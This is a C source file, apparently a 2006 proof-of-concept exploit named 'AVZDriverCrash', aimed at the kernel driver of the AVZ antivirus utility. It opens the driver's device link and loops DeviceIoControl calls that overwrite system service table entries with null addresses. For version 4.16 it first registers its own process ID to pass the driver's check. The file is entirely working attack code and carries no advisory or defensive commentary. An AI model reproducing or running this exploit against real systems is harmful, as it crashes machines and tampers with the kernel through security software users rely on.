//
// AVZDriverCrash
// Version 1.1
// Copyright (c) aintrust, 2006
//

#define WIN32_LEAN_AND_MEAN						// Exclude rarely-used stuff from Windows headers 

#include <stdio.h>
#include <windows.h>

#define	AVZ_SYS_DEVICE_LINK						"\\\\.\\AvzKernelDeviceLink"
#define AVZ_IOCTL_SETSYSTEMSERVICEADDRESSBYNO	(ULONG) 0x00222010
#define AVZ_IOCTL_SETPROCESSID					(ULONG) 0x00222024
#define	SLEEP_TIMEOUT							100

typedef struct _vars 
{
	DWORD dwServiceId;
	DWORD dwServiceAddress;
} VARS;

typedef struct _vars4 
{
	DWORD dwVar1;
	DWORD dwVar2;
	DWORD dwVar3;
	DWORD dwVar4;
} VARS4;


//
// main(int, char **)
//
int main(int argc, char* argv[])
{
	HANDLE hDevice;
	VARS vInputBuffer;
	VARS vOutputBuffer;
	VARS4 vars4DriverInputBuffer;
	VARS4 vars4DriverOutputBuffer;
	DWORD dwBytesReturned;

	printf("AVZDriverCrash, version 1.1; Copyright (c) aintrust, 2006\n\n");

	printf("Waiting for AVZ kernel driver to load... ");
	while (TRUE)
	{
		hDevice = CreateFile(AVZ_SYS_DEVICE_LINK,
							GENERIC_READ | GENERIC_WRITE,
							0,
							NULL,
							OPEN_EXISTING,
							FILE_ATTRIBUTE_NORMAL,
							NULL);
	    if (hDevice != INVALID_HANDLE_VALUE)
			break;

		Sleep(SLEEP_TIMEOUT);
	}
	printf("OK\n");
 
	//
	// AVZ version < 4.16
	//
	vInputBuffer.dwServiceId = 0;
	vInputBuffer.dwServiceAddress = 0x00000000;

	while (TRUE)
	{
		if (DeviceIoControl(hDevice, (DWORD)AVZ_IOCTL_SETSYSTEMSERVICEADDRESSBYNO, 
							(void *) &vInputBuffer, sizeof(vInputBuffer), 
							(void *) &vOutputBuffer, sizeof(vOutputBuffer), 
							&dwBytesReturned, NULL) == 0)
			break;

		vInputBuffer.dwServiceId++;
	}

	//
	// AVZ version = 4.16
	//
	vars4DriverInputBuffer.dwVar1 = GetCurrentProcessId();
	vars4DriverInputBuffer.dwVar2 = 1800;
	vars4DriverInputBuffer.dwVar3 = 0;
	vars4DriverInputBuffer.dwVar4 = 40;

	if (DeviceIoControl(hDevice, (DWORD)AVZ_IOCTL_SETPROCESSID, 
						(void *) &vars4DriverInputBuffer, sizeof(vars4DriverInputBuffer), 
						(void *) &vars4DriverOutputBuffer, sizeof(vars4DriverOutputBuffer), 
						&dwBytesReturned, NULL) == 0)
	{
		printf("AVZDriverCrash error: DeviceIoControl(0x%08x) failed, error %d\n", AVZ_IOCTL_SETPROCESSID, GetLastError());
		CloseHandle (hDevice);
		return 1;
	}	
					
	vInputBuffer.dwServiceId = 0;
	vInputBuffer.dwServiceAddress = 0x00000000;

	while (TRUE)
	{
		if (DeviceIoControl(hDevice, (DWORD)AVZ_IOCTL_SETSYSTEMSERVICEADDRESSBYNO, 
							(void *) &vInputBuffer, sizeof(vInputBuffer), 
							(void *) &vOutputBuffer, sizeof(vOutputBuffer), 
							&dwBytesReturned, NULL) == 0)
		{
			printf("AVZDriverCrash error: DeviceIoControl(0x%08x) failed, error %d\n", AVZ_IOCTL_SETSYSTEMSERVICEADDRESSBYNO, GetLastError());
			CloseHandle (hDevice);
			return 1;
		}	

		vInputBuffer.dwServiceId++;
	}

	CloseHandle(hDevice);

	return 0;
}
